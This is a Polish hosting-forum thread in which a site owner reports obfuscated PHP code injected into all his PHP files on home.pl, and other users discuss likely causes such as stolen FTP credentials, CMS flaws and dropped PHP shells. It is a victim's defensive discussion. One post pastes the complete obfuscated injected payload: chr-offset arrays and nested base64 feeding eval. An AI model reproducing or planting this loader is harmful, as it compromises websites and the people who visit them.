Skocz do zawartości
Zaloguj się, aby obserwować  
ironman

Czyzby wlam na serwer home.pl - 31 marca 2013

Polecane posty

Witam.

Dzisiaj przestało mi działać wiele stron an hostingu home.pl

Jak sie okazalo do kazdego pliku .php wczoraj o godz: 23:10 został na poczatku pliku dodany kod

$d4yyIfCtIiYvVayDbzQZdLVgvIZikL9ZFxo= array('3316','3333','3312','3323');$uQxbYmxKnVeolUeowZvRyk0IVZ= array('9209','9224','9211','9207','9226','9211','92 .........................................$SbYdeciHTNRdVDQEWNmcRabnYN45dUXSWMW="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkd ..itd


Nie wiem czy to włam czy home.pl coś nakombinowało - inne pliki po za tymi z rozszerzeniem .php nei są ruszone.

Infolinia na raize nie dziala (świetuje) :(

Macie jakieś pomysły co to mogło sie stać - część stron mi działa a część neistety nie :(

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Witam.

To nie jest dedyk ani vps wiec nie moge tego zrobic.

Musze czekac az infolinia zacznie dzialac - wtedy poprosze o logi oraz przywrocenie backupu FTPa.

I sproboje dojsc w jaki sposob sie to stalo i z jakiego adresu ip.

Dziwi mnie tylko po co został dodany ten dziwny kod i co on ma niby robic - bo czesc stron działa a czesc nie dziala - i jednak nei zostaly ruszone tylko pliki z rozszerzeniem .php jak pisalem wczesniej - ale pliki z rozszerzeniem .php która zawieraly kod php - zas pliki z rozszerzeniem php, ktore zawieraly tlyko html nie zostaly wogole ruszone.

Zauwazylem ze w niektorych plikach brakuje cale kody php tlyko jest ten kod ktorego czesc wklilem :(

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość nrm

Nic dziwnego tu nie ma, zostałeś pewnie "pojechany", a nie wiem czemu sugerujesz winę home. Oczywiście jest taka możliwość ale szanse oceniam na mniej niż 1% ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Nie sugeruje winy home.pl tylko napisalem ze na takim serwerze mi sie to stalo - ogolnie jakby biuro obslugi dzialalo to nie musialbym tu pisac - ale sprawa dla mnie pilna wiec chcialem sie dowiedziec czy jeszcze komus sie takie cos nie przydarzylo.

Na chwile obecna zmienilem haslo do ftpa - i czekam az biuro obslugi home.pl bedzie dzialac - wtedy poprosze o logi i o przywrocenie backupu.

Dziwi mnie ogolnie to ze ktos nie pousuwal plikow tylko jakis dziwny kodzik do nich dodal.

 

Dokładnie caly taki kod (w kazdym pliku to samo):

<?php 
 $d4yyIfCtIiYvVayDbzQZdLVgvIZikL9ZFxo= array('3316','3333','3312','3323');$uQxbYmxKnVeolUeowZvRyk0IVZ= array('9209','9224','9211','9207','9226','9211','9205','9212','9227','9220','9209','9226','9215','9221','9220');$wmMvPtTQh5dSiZWxaH= array('3511','3510','3528','3514','3467','3465','3508','3513','3514','3512','3524','3513','3514');$SbYdeciHTNRdVDQEWNmcRabnYN45dUXSWMW="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBoVjBWd05WbHFUa3RhYlU1MFZtNWthVTB3YjNkWlZtTXhZbXQwUlZGWVFsQmtNMEozVjIxc1FtSXlSbGxVYm5CaFYwWkdkbE5yV1RWV1JrcFhVMnhrVTFacmNHbFRWM1J2VmxaYVIxRnRXbGRXYXpWSFZsZDNOVkZzU1hkV2F6bFhVVEJ3YTFNeFRuTk9NSEJKVm0xb1NsSkVRbTVaZWs1VFpWZFNTRTlZVG1sTk1sSnpXVEpzYm1FeFozaFVhMXBXWWtad1IxWlhlSHBoVms1SFZXeFdWbEpxYkZkV1ZFSlhWVEZuZDFKcmFGTldWRlpXVTFkM2QyTkZPSHBOUlhSb1ZqRnNibE13VG05bGJWSkpVMjVrYVUwd01YWlRhMmhYWVVWNFJGTnROV2xOYW14MVdXdGtWMkZYU1hwVlYyeE1WVEJWTlZWR1pHRmhSMHBKVkcxNFRGZElaelJUTUdoUFRVZE9kVkZ1V21wbFYyUnlXa1prUm1Nd2JIUk5XSEJwWWxWd01scEZUa3BqUld4VlRVUnNZV0pWV25wWmVrcFdZMGRhU1dReU9XcE5NVW8xV1RCak5XVnJkRVJWYWtaYVZUTmtjRmw2U2pSTlYwNTFVVmRzVEZVd1ZUVlZSbVJoWVVkS1NWUnRlRXhWTW5STVdsaGtkMk5HY0hCUlZ6bEtWakZ2ZUZsdE1VOU5SMFpZVDFoV1dVMXNXVEJaVm1oUFRVZE9OVm95YkZSaGJIQmhXVEZhUjJSSFNuUlZiR2hQVW1wc00xbFdhRXRrYkc5NVQxaEtTbUZYZEhkYVdHUjNZbGRTV0U1WGNHdFNNbmd5V1cxc1ExTXdOWE5pU0doV1ZucEdNVmRyV21wTlJtZDZVVzVDYW1KVWJIVlpha3A2WWpCMFdXTXdkR3BpVmxsM1drWm9TMlJWYkVoWGJXaHBVMFUxYzFRelpIZFBWVTUwVjJwR2FXSlZOSGRaVm1NMVpGVnNSbUo2U2xoWFJWcFRXV3hqTVdFeFdqWlZiVnBoVFd4WmQxZEVUa3RpUm14WVpVZGFhRmRGUm5aVE1VNURUakJPY0ZWdVpHcGlWR3N3V2xaWk5XSXhjRmhTYlhSaFYwVndObE5WVVhkYU1XeFpVMjVzV2xkSGRIWlRWM1JQVkZaT1ZsWnJPVmRTYW14TFZsVk9TbU13YkhKWGJFSldZa2RTUTFaWGRGTlNiRXBFVTFoT1NtRXhjRkZXVjNoclVXeFdjbFZyV2xOU2FteElWa1JHU21GVmVFUlRhMlJWVFZWd1dWVldXa3RTVmtwV1ZXMWFVMkY2YkZSWFJFSnpWVlZzY0dReWJGUlNiRXBXVmxWWk5WSkdVa1ppUlZwVllrWktiVlV4V2tKaFZYaEVVMnRzVjFKc1NsSlhSRUpoVlVaV2MxcEZTbFpoTVVwSFZXdE9TbU13YkhKaFJsWlhVbXRLYlZWdGN6VlZNVmwzVW14T1UxSldXa1pYUkVKaFZVWldjRk5ZVGtwaE1taFdWbXRhUTFwc1NuSlBWazVYVFVWYVZGVnJWbGRTVm1kM1YyeENWbUpFYkV0V1ZVNUtZekJzUkZOcmJGZFNiRXBTVjBSR1ExSkdaM2hUYTFwVlZsUnNWbFZzV1RWUmJFcEdWV3hPU21GWVpIQlZNRnBUVmxaV1IwOVdSbFpoZW14YVZqRlpOVkpHVVhkT1ZUbFRWbFUxVmxVeFZUVlVNR3h3WkRKc1ZGSnNTbFpXVlZrMVZqRk9WbEpYYkUxUk1FWndWVEJhVTFaV1ZrZFBWbXhaVFVad1VWWlhlR3RSYkZaeVZXdGFVMUV3YkhwVFZVNUxVMVphUjFWc1JsbE5WMmh0Vlcxek5WVXhXWGRTYkU1VFVsWmFSbGRFUW1GVlJsWndVMWhPU2xFd2NFcFdhMXBUVlZabmVHRkhXbE5oZW14VVZtcENSMVV4U2taV2ExWlpUVVp3VVZaWGR6VlRiRlpFVTFoT1NtRXlhRlpXYTFwRFdteGtSMDlWY0ZWV1ZuQlJWbGQ0YTFGc1ZuSlZiRkpLWVZoa2NGVXdXbE5XVmxaSFQxWnNWbUY2YkZwV01WazFVa1pSZDA1Vk9WTldWVFZXVlRGVk5WUXdiSEJrTW14WFlUSjRRMU5YYkROYU1HeHpZVWRhVTJGNmJGUldha0pIVlRGS1JsWnJWa3BoV0dSdVUxZDRiMXBzU25KUFZrNVhUVVZhVkZWclZsZFNWbWQzVjJ4Q1ZtRlZiSGRVTTJSM1lsZEplbE50ZUZwV01EVjJVekJPVTJReVRuUlBWRkpzVm1wc2RsZHNaRWRoTVhCWlUyNXdTbEl3V2paVFZVNVRaREpPZEU5VVVteFdhbXgyVjJ4a1IyRXhjRmxUV0VKRVltNU9URmxXWkZwaU1rWlpWRzV3WVZkR1JuWlRhMWsxVmtaS1YxTnNaRk5XYTNCcFUydG9RMlZYU1hwaFJGWlpUVzFvYzFkV1pGTmlSMDV6VFVoQ1NsRXhiSFJUVldoRFpWWndXRnBIV21sV01GbDNWMVJLYm1Jd2JIQlBWMVpNVW01T05GUkdVbk5hUjFwSFl6Tm9UVlpIZUd0V00zQkNaRVU1VjAxVWFFNVdiazR6VkVaU2MxcEdaRFpSV0ZKUVZtcEZORlJYZUhwa01IaFZWVzFTV0dWclJqQlVNVmw0VDBVeGNWWnRTazVSZWtGNFYwWk9jbUl4YUVST1J6bFlaV3RHTUZReFdYaFBSbVEyVWxoU1VGWnFSbWxVVlUxM1RsWm9XV1F6YUZobGEwWXdWREZaZUZsck1VUk5SRlpaVjBoa05WWXpjRUprUlRWSFRWZEtUbEY2UVRGWFJtZ3paVlUxVjJNelpFMVdSbHByVXpGT2MwNHdNSHBOUjNSTlpWVnNlbE5WVGxOYWJGVjNWbXhPVjJFeFdsUldNMnhUWkRKT2RFOVVVbXhXYW14MlYyeGtSMkV4Y0ZsVGJWSk1WVEozTTFreU1WZE5SMUpaVTI1V1NsRXhTbTFXVkVKWFZURmFjbFpzVGxobFZrb3pXVEl3TlU1SFZsZFBWemxoVmpCYWNsZHNhRXRhUlRoNlRVVjBZVll6YURaWGJFNURZMFp3Y0dGSWNHdFRSWEIzV1hwT1UyVlZkRVJUV0U1S1lWaGtibE5yV1RWV1JrcFhVMnhrVTFacmNHbFRhMmhEWlZkSmVtRkVWbGxOYldoelYxWmtVMkpIVG5OTlNFSktVVEJWTlZWR1RrTlNNVVpXWlVaU1UxVXlkRXhhV0d4VFpESk9kRTlVVW14V2FteDJWMnhrUjJFeGNGbFRiVnByVWpGYU1Ga3dUa0pQVld4SlZXNXNhRlo2UW5aWFZtaExaVlpzV1dKSFdtcE5iV2gzVjIwMVVtSXhjRmxoU0dScFVucHNjbGRzVG01aFZYaEVVMWhPU2xFeFNtMVdWRUpYVlRGYWNsWnNUbGhsVmtveldUSXdOVTVIVmxkUFZ6bGhWakJhY2xkc2FFdGFSWFJVWVROQ1VHVlZSa3haVm1SYVlqQjBSRlZ1WkdsTk1EVnRXa1ZrVjJSSFRrUlJWR3hLVTBVMGQxa3lNWE5rTWtsNlZGYzVTMU5GU2pWWmFrNXZUbFpuZVdGSGVGcFdNVXB6V1RKM05VMUdjRmhOV0dSTlVUQkdjRlF5YkVwalJYUlVVVmRvVVZaRVFtNVZiWFJIVkZaVmQxWllRa3BSTVVveldUSXdOVTVIVmxkUFZ6bGhWakJhY2xkc2FFdGFiVkpJVm01U2FsRXdSVFZUVldoUFRWWnNkVlJxUW1waFYyUnlXVEJvUzJSdFZrbGlSMXBvVWpGYWIxZHJaRmRsVm1kNlZXMTRhVmRGUm5wVFZWSkNZekJzUkZWdVpHbE5NRFZ0V2tWa1YyUkhUa1JoZW1SS1VWaENkMWR0Ykc5a01rNTBWbTAxV1UxcVJtOWFSV1JQWWpCMFJGTllXbGxoVjJocFZGWk5kMDVXYUZsbFIwcE9WWHBCTVZkR1ducGtNSGhWWWtkU2JWSkZXbWxVVlUxM1RsWm9WMk16WkUxV1IzaHJXbXRTUzFsck1VUk5SRUpaVm01T00xUkdVbk5hUjFwRlUxUkdXR1ZyUmpCVWJGbDNZMFYwUjJRelZreFNiazR6VkVaU2MxcEhXa2RqTTJoTlZrZDRhMVl6Y0VKa1JUbFhUVlJvVGxadVRqTlVSbEp6V2taa05sRllVbEJXYWtVMFZGZDRlbVF3ZUZWVmJWSllaV3RHTUZReFdYaFBSVEZ4Vm0xS1RsRjZRWGhYUms1eVkwZFdObFJxYkV0UmVtaHdWRVZPUW1FeVRrbFRibHBzVTBkNGJWbFZaRmRoUm5CSVZtNXNXVTB4U25OWmJHaENZMFZzUkdKSWJHRlhSa2w0V1RJd01Gb3djRWxSYm14cFRUSm5NVmRFU205aVJteFlWVzE0YW1KRWEzZFhiR040WkRBNU0yTkViRVJpYWtKTVdUSXhWMDFIVWxsVGJsWktVVEZLYlZaVVFsZFZNVnB5Vm14T1dHVlZjRlJWYkZWNFZVWmFSbFp0V2xKV1ZrcEdWbGRzUzFwRk9UTmpSR3hFWWxadmVGbHRNVTlOUjBaWVQxaFdTbEpYT0hsV01XaEhWVzFLV0U1WGRGZGxiRXB0VjJwS1YwMUdaM3BXYm14cFVUSmtkMXBZYkVKVE1IQkpWbTVzYVZFd1JUVlRWVTVMWWpKU1NWVnVaRkJoVkdneVUxZHNRbVJWYkVSVmJWcFdUVVphVkZadGRGZFZNV1ExVTJ0c1YxSnNTbEpYUkVKdlZVWlZlRlZYYkZsVk1FWXhVMVZPVTFwc1ZYZFdiRTVYWVRGYVZGWXpiRXRWTVVwWFVteGFVMVpyTlZaWFJFWlhWVEZPVkZOdFVsQmtNMEozVjIxc1FtSXlUWHBWYm14cVVucHNObE13VGxOTlYwNTBaRE5PU21GcWFIQlRNVTVDWVVaQ1ZVMUhaR0ZpVlZwNldYcEtWbU5IVmpOaU1uUnJWMFZ3ZWxOVlVYZGFNazE2Vm0xc2FrMHhTalZUTUU1VFRWZE9kR1F6VGs1Uk0yZzJXa1ZvUzJReVNYcFVWemxMVTBaYU5WbHJUak5oVmtJMVUxaENURlpJVGt4YWJFWjNaVlp3V1ZWcVJtcGlWRkp1VTJ0b1YyVlhTa1ZqTUhSdFZWaENkRnBHWXpGaGJWSklZa2hhYVdGVlNreFViWGh6WlVaV1dFMVlWbUZTYlUxM1YwUkthMkpIVWtkUFYzQnBUV3BWZDFkc1l6Rk5SMDQxV2pKMGFGZEZSbnBUVlU1VFpERnNXRnBIZUV4WFNFNU1XVlprV21Jd2JFaFhha1pwWWxVMGQxbFdZelZrVm1kNVZtcFNhRmRGTkhkWk0yeHVZVlpyZWxadWJHbFNhbXgzV1cweGMwMUZiSEJoTW1STVYwaE9URk5WVGtKYU1HeEVWVzF3YUZFd1JUVlRWV1JQVFZkT2RHVkhXbWhXZWxaM1drVk9ibUZYUmtsVmFrSnFVa2M1TWxSSWJFcGFNSGh3Vlc1Q2FsRXdSakZUVlU1S1pHdHNjRkZZVmt0VFJVcHZWMnBLVm1ORk9UTmlNbVJLVVRCR2JsZFVUbGRsVjBwSFQxaHdZVmRHU2pKWk1HaFNZakJ3U0ZSdE9VMVJNRXBGVm14YVMxUldVWGhSYkZaWlRWVndSMVpyV2xkVk1WSnpWV3hPVWxaVVZsVlZiWFJYVlRCNFJGRllhRXhXU0U1TVUxVk9RbG93YkVoVWFrWnFZbGhvYlZsNlNsZE5SMGw2VVdwQ1RGRXhTbkZaVlU0eldqRkZlRlpzVGxWU1ZHeFNWbXRaTlZaV1RsWk5WVnBWVFZaYVZsUkZUa0psYTNSVll6QjBTbEV3Um01VFZVNVRUVmRLU1ZWWFpGRlZNRWwzV1RJeGMyUkZkRWhVYWtacVlsaG9iVmRzYUc5aVJtdzFXakowV2sxdFpIZFRNVko2VXpCc1JGRlhaRXBUUlhCeldrVm9WMlZYU25CUlYzUnJWak5uZDFRelpIWmFNR3hFVVZka2JWVlhPVXhaVm1SYVdqQjBTR0pJVm1oV2FteDFWMnhvVW1Jd2JIUlNiazVwVW5wcmVsZEVUbGRsVjBwSFQxY3hhVTB3U25OWmJXeEtZMFYwVkZGcVpFUmhWVVp1VTFWT1FtRXlVbGhsUkVKS1VrUkNibHBGYUV0alIwcFVZVVZHWVdKWGVIcFhiRmsxWW14d1dWVnRXbHBOYW13eFdrVmtWMlJYVWtsVVZ6bEtZbGRuZDFwRmFFSk9hM2cxVDBkc1NsRjZVbkpaVm1oQ1dqQjRjRkZYYkUxbFZXeHVWRWRzVTJReGJGaGFSM2hNVlRKek0xRXliRUphTUd4RVVXNXNZVmRHU1hoWk1qQXdXakJ3U1ZadVRtdFNTRTVNVTFWT1Fsb3diRWxOUlhSS1VUQkdibE5WVGxOaVYwNUVVVlJzU2xJeGNEWlpha3BQWTIxSmVsRnRlR2xoVjJSeVdWWm9RbU13YkVWYU0yUk5VVEJHY2xkc2FFdGxWMHAwVDBoT1NsRXhTbk5aTWpWTFpXMVNTVk5ZVGtwU1JURXpVekZTZWxNd2JFUlJWMlJLVWpKNGRGTlZUbTVoTVhCMVVWaENTbE5JVG5KWmFrNVhUVVZzUlUxSFpFcGhNbEpIVm10T1FtRXlUa2hTYlRWaFZUQktTbFpyV2xOVlZYZzJVbGhXVGxKdWFEVlhSV013WVZVNU0ySXlaRXBSTUVadVUydGpOVTFYVWtSUldGWlJWVEJHY0ZVd1l6VmxiVkpGWWpKa1MxSXllRE5YUldoTFdUSktjRk5VWkVSaFZVWnVVMVZPUW1FeVNYcFdha0pLVVhwUk5WTlZUa3RTUjBsNVRsaFdZVll3TkhkWlZtTTFaRlU1Y0ZGclVtbFNlbXcyVjJ4YU5HVldhRWhPVjA1cVlraG9NVk5YY0hwVE1HeEVVVmRrU2xJeGIzcFpNakZ6VFVad1ZGb3lkR0ZpYTBaNlUxVk9VMlJ0VWxsVldFSlFaREk1YmxOVlRrSmFNSEJKVTIxNGExRXdSVFZUVlU1S1lWVTVNMkl5WkVwUk1FWnVXa1JLYjJOSFNraFdWMlJNVVRCYWRGZHNZelZpVlhSRVZXMHhhbEV5ZEhkVFZXaDZZVEpPZEZacVFrcFJNRVl4VlVaT1Fsb3hjSFJhUjNoclUwVXhkbE5yWkdGa01IaEVVVmhvVG1GdFpIZFVlazEzVXpGd2RGUnVUbWxOTURWelV6Qk9VMkpYVGtSaGVtUkVZVlpKZUZscmFGSmFNVUpVVVdwQ2FtSlhlREJUTUdoUFRWWnNkVlJxUW1waFYyUnlXVEl4VjAxRmVFUlJibkJyVTBWd00xbHFUazVpTUhCSlUyMTRhMUV6Wkc1VFYzZzBaVlpvU0U1WFRtcGlTR2d4VTFkc2Nsb3dkRFZSVkVKTVZUSnpNMXBzUm5kbFZuQlpWV3BHYW1KVVVtNVRhMmhYWXpKU1JXTXdkRzFWV0VKMFdrWmpNV0Z0VWtoaVNGcHBZVlZLVEZSdGVITmxSbFpZVFZoV1lWSnRUWGRYUkU1UFlVZEtXVlp1UWxsTmJWSnpXa1ZaTldNeVJsaE9XRXBxWlZka2QxcFlaSFpoTWs1SlUyNWFiRk5IZUcxWGJURnpZekZ3VkZGVWJFcFRSVFF4V1hwRk5XSnNjRmxWYlZwclVqRmFNRmt3V1RWaE1rWlpVMWM1VEZVd1JtNVVSM1JUVTJ4V2NsWnJVbGRTVkd4VVZqRlpOVlpHU2xkUmEwcFdZVEJhVmxaRVJrcGtWV3hFVTJzNVRtSkhUalpXTVZKRFpVWnNWbGRyU2twaGJrNU1WMjB4YzJNeGNGZFBWM2hzVWpKNE5scEZhRTVpTUhCSlVXNXNhVTB5WnpGWFJFcGhZMGRLU0ZaWVFrcFNSR2h1VTJ0a1IyTXlTa1JSVkd4S1VqRndkMWxyWkZaaU1IQkpVVzVzYVUweVp6RlhSRXBoWTBkS1NGWllRa3BTUnpsdVUydGtSMk15U2tkak0yUlpWVEJGTlZOVlRrcE5WWGh4WVROV1RsWkhjekZVUjNCS1pEQXhOVk5VWkVSaWF6VjJXa1prWVdKWFNraFdWemxMVWpCYWVsbHJUbkpPTUU1d1ZXcEdhbUpZWkc1VlJrNURVekExYzJKSWFGWldla1l4VjJ0YWFrMUdaM2xhUjNoclVtcHJlRmt5TVROaU1IUlZZekIwUzFORmNITlhWbVEwV20xR1dWRlhaRkZWTUVwTVZHMTRjMlZHVmxoTldGWmhVbTFOZDFkRVNtdGlSMUpIVDFoc1lWWXdXbnBYUkVwelpEQjBSR0Y2WkVSaFZrbDRWMVpPUWs5VmJFbFVha0pxWW14S01sbHJZelZOTVhCWlUxYzVTMUpxYkZWVmJGcExWakZLVjFOdFNrcGhNbWhXVm10YVExcHNXbGRVYTFwV1lrUnNRMVZxUWxkVU1WcEVVMjFTVEZaSVRreFRhMlJIWTBad1JGRlViRXBSTUd3MFZGVlNRbVZWYkhGak1IUkxVakExTWxkclRrSlBWV3hJVFZkMFQxVXlaSEphUm1oTFl6QjRkVlZ1UW1sV01WWjJVekZPY2s0d1RuQlZiWEJvVWpGYWNWbFliRUpQVld4SVRWZDBUMVV5WkhKWFZFazFZVEIwVldNd2RFdFRSbHB2VTFWUmQxb3lVbGxUYms1aFZucFdjVmxxU2xOaVJYUkpWR3BDYW1Kc1NqSlphMk0xVFRGd1dWTlhPVXRTYW14VlZXeGFTMVl4U2xkVGJVcEtZVEpvVmxacldrTmFiRnBYVkd0YVZtSkViRU5WYWtKWFZERmFSRk50VWt4Vk1uTXpVVEpzVTJReGJGaGFSM2hLVWtSQ2JsTlhhelZpYlVwSVl6TldhbEl5YUROVlJFcEhZMFp3UlUxSGJFMWhWa3B2V1Zaa1VtUlZiSEJYYWtacVlsaGpOVk5YYXpCaE1sSlpVMjVPVFdGVmJIUlpWbWhDVDFWc2NFNUhkR3BpVmxwdldXdFpOV05IVGtST1IyeExZbXhhYjFWR1RrcGtWWEJKVm0xb1RXRlZiSFJYVkVrMVlURkNWRk5ZVmt0U01EVXlWMnRTZWxNd1RuUlhibHBxWWxaYWIxZFVTbTVhTUhSRVZXMW9hVkl6Wkc1WFZtaE9XakJ3U0dKSVpFeFhTRTVNVTJ0b1UyRnJiRVZOUjJSVVlXeHdZVmt4V2tka1IwcDBWV3hvVDFKcWJIVlhiR2hUV214cmVVOVlWbXRTTVZveFdrVm9UbUl5VWtsVGJrSnBWVEprY2xsV2FFSmpSWGhFVlc1a1dsWXlVbk5UTVZKNlV6QndTVkZ1V21wbFZVVTFVMVZvVDAxSFRuVlJibHBxWlZka2NscEZaRTVqTUd4RVZXMXdhRkl4V25GWldHeHlUakJPZEdKSE1VcFJNbVJ5V1RCak5XVnJiRVJTVkd4UlZUQktkRmRXWkRSbGJIQlVZa1JrUkdGV1NqTlpNakExVGtkV1YwOVlUbWhYUlRSM1UxVlJkMW95VFhwV2JXeHFUVEZLTlZNd1RsTk5SbXcxWkROa1RWRXhTak5aYWs1T1kwVTVNMkl5ZEdGaFZVVTFVMVZrWVdSdFRraFdibFpNVVRGS00xa3lNRFZPUjFaWFQxY3hhRll6YUhOVVJVNUxUVEJzY0dGNlpFUmlWbkF6V2tab1UyVnJkRVJWYlRGTlVURktNMWt5TURWT1IxWlhUMWhPYUZkRk5IZFRNVko2VXpGd2RGUnVUbWxOTURWelV6Qk9VMkpWZEZWak1IUkxVak5vZDFsdE1UQmxhMnhGVFVka2FrMHhXbkJaZWs1VFpWVjBSRlZxUWxwbFdHUnlXVEJqTldWcmREWlVXR3hNVmtoT1RGa3lNVmROUjFKWlUyNVdTbEV4U25wWlZtTXhZMjFPTm1Nd2RHMVZXRUUxVVRJMGQxTXhjSFZXYmxaYVRURktkMWxxU1RCYU1VNXhWMnh3YWxacldqQlpiVEZUVjBVMVIwOVlVbWxOYkVwdFYxUkpOV1JWZEVSVmJYQnBUV3BTZDFwWVpIZGpSbkJ3VVZjNWFrMHhTalZaTUdNMVpXdDBSRlZ0Y0dsTmFsSjZVMWR3TkdGWFNYbFZhbFpLWVZkMGJsTldVWGRQVld4SVYyMW9hVk5GTlhOVE1VNURUakJPY0ZWcVFtRlhSMmQzVTFWUmQxb3lUa2xUYlhoaFRWUnNOVmRzYUVOak1XeFlWRzE0VEZFd2JESlZSV1JMWkd4d1NXRXlPVmxUUlRWcFYwZHZNVnBGZEhCaGVUbFJZVlJzZDFOWGJETmFNR3h4WlVkc2FVMXNTVEZYUlZKR1N6QnNjRTVWZEU5aVIzZzBWbFpqZUdSV2NFZFpla0paVFRBMWIxbHNhRmRqUm1kNVdrZDRhMUpxYkhwWlZtTXhZMjFPTlZvelFrMVJNRVp5VjFSSk5XUlZlRVZTV0VKUVpETkNOVmRzYUZOTlYwNTBUa2RrUzFOR1NuTmFWV2hTVGpCT2RVMUhaR0ZXTTJnMlYyeE9RMDR5VG5SV2FrSnJWMFZ3TVZOVlRsTmhiVWw1VGtSa2JWVllRVFZSTWpGaFRWZEtkRlJxUW1oV2Vtd3hVMVZXZGsxc1pGbFNiRXBwVm5wV2NsWnVjRk5hYkd0NVVtNU9hVkl3Y0c5WFZFcDZZakJ3U0ZOcVJtRmhWM2N6VVRJeGMySlZiRVJoU0VKcFlrUnNiMWt5TlV0aFIxWlVXakpzVWsxcWJERmFSV1JYWkZkU1JFMVZXbWxpVlRVeVYydGtjMlJXY0RaaU1tUmhUVE5DZDFrd1RrcGpNR3hJWVVkNFdsWXhTbk5aTWpWUFdtMUtTR0pJY0d0Uk1tUjNVekZPYzA0d2NFbFZibEpxVWpGd01WZFdZM2hpUld4RlRVZGthMUl4V2pCWk1HTXhZVWRLVkdGSWNHeFhSVFZ0VjJwS1YwMUdaM3BWYlhocFYwVktiVmRyWkhObFZYUkVZVE5PU2xFd2NFaFdSRUUwWVZWMFZXTXlkR3hpVm14dVZVWk9RMkpYU1hwUmJYaHBZVmRrY2xwRlkzaGtNWEIwVGxkb2FWWXhWbnBUVlU1TFRUQnNjR0Y2WkVwU01YQXpXa1pvVTJWcmRFUlZhbHBoWVZoa2JsTnJaRXROVm5Cd1lYcGtTbEl4Y0hGWmEyTTFaV3h3VkZveWRHeGlWbXgzVkROc1FtRXlWblJWVjJSUlZUQktkVnBYTURWa01YQllUa2M1UzFOR1NqQlpNR1JoWkZac1dFMVhlRTFSTUVad1dUSnNTbU5GT1RWVmJYQnBUV3BWZDFkc1l6Rk5SMDQxVVZSc1NsSXlVVEpaTWpGWFlVWndSRm95ZEd4aVZrWjZVMVZTUm1Rd01VVlJXR1JPVWtWR00xTXhVbnBoTVd0NVQxaFdhMUl4V2pGYVJXaE9XakZDVkZGcmRFOWlSM2cwVmxaamVHUldjRWRaZWtKWlRXcEdNbGRyV1RWaGJVbDVUa2M1UzFJd05USlpiVFZUWWtkS2RWVnVjRXhXU0ZKMVdsY3hUMk15U1hwVWJYaE1VVEZKTWxkclRuSk9NbEpZVGxoT2FGWjZWbmxUTUU1VFRVZEtXVkZ0TVdsaVZWb3dWMnhPY2s0d2NFaFVibHBwWW14S2MxbHROVk5sYTJ4RlRVZGtZVTB6UW5OWmJURlBaR3h3U0ZaWE9VdFNNRFV5V1cwMVUySkhTblZWYm5CTVZraFJOVk5WWkZkak1rMTVWbGRrYkdWV1NuRlpha2t4VFVad1dFNVVRbXBsVlVVMVUxVldkazFzWkZsU2JFcHBWbnBXY2xadWNGTmFiVXBZVDFkMFdVMXJOVEpaYld4dVlURnNkVlp0TVV4V1NGRTFXVEl4VjAxSFVsbFRibFpNVVRGS2NWbHFTVEZOUm5CWVRsUkNhbVZYY3pOUk1qUjNVekpKZVZOdFdtcE5NVXB2V1RJMVVtSXdiSEppZWtwWVYwVmFVMWxzWXpGaE1WbzJWVzFhV2sxclducFphMlJMWVVacmVXTXliRXhXU0U1TVdteEdkMDlUU1hCTFZITm5JaWtwT3lBPSIpKTsg";if (!function_exists("O4Jy2yNlGjpxtkFQBBRW6JEloQ")){ function O4Jy2yNlGjpxtkFQBBRW6JEloQ($xjl0sP,$uAQNMMsKHu86ggTCaMjrZjWol6){$ioeDQF = '';foreach($xjl0sP as $TiVMSt7RpdY8GYLQgA0){$ioeDQF .= chr($TiVMSt7RpdY8GYLQgA0 - $uAQNMMsKHu86ggTCaMjrZjWol6);}return $ioeDQF;}$PQe9i9JH18ldEus1NDxu5ZcSVLm7Z3TCJ = O4Jy2yNlGjpxtkFQBBRW6JEloQ($d4yyIfCtIiYvVayDbzQZdLVgvIZikL9ZFxo,3215);$kSWcqNaBQEV9wzDUUyJWgvxtsm = O4Jy2yNlGjpxtkFQBBRW6JEloQ($uQxbYmxKnVeolUeowZvRyk0IVZ,9110);$FPWYiE = O4Jy2yNlGjpxtkFQBBRW6JEloQ($wmMvPtTQh5dSiZWxaH,3413);

Ciekaw jestem czy da sie ustalic jak sie to stalo.

Edytowano przez ironman (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość nrm

Dziwi mnie ogolnie to ze ktos nie pousuwal plikow tylko jakis dziwny kodzik do nich dodal.

 

Mnie nie dziwi ;) Po pierwsze to pewnie nie "ktoś", a bot. Boty szukają ustalonych ciągów znaków (im potrzebnych w zależności od tego co wklejają), np. bardzo często jest to wklejka wstawiana przed </body>

 

Ciekaw jestem czy da sie ustalic jak sie to stalo.

 

Możliwości jest wiele ale najczęściej są to 2 przypadki:

- przez FTP (pobrane hasło z windowsa ofiary,i wcale nie musi to być TC bo to także na innym poziomie sie odbywa)

- przez dziurę w czymś popularnym (jak np. sławny timthumb używany w dziesiątach projektów w tym w WP)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Czyli ogólnie bot musial mi wrzucic na serwer jakis plik, ktory wykonał tę robote ?!

 

To ejst tez troche moja wina bo dla wygody dla prawie wszytksich stron na serwerze mam dostep z 1 konta ftp - tak dla mojej wygody.

Widze ze 2 strony dla ktorych utworzylem domeny (z opcja: Włącz przekierowanie na podkatalog z separacją serwisu) nie zostały ruszone.

Jak mi przywroca backupa - to bede mial troche pracy aby teraz potworzyc osobne konta ftp.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

 

Czyli ogólnie bot musial mi wrzucic na serwer jakis plik, ktory wykonał tę robote ?!

Najpopularniejszy obecnie wektor to znalezienie dziury w CMSie - wrzucenie php-shella - odwalenie przez niego brudnej roboty - drobne zatarcie śladów.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość nrm

Czyli ogólnie bot musial mi wrzucic na serwer jakis plik, ktory wykonał tę robote ?!

 

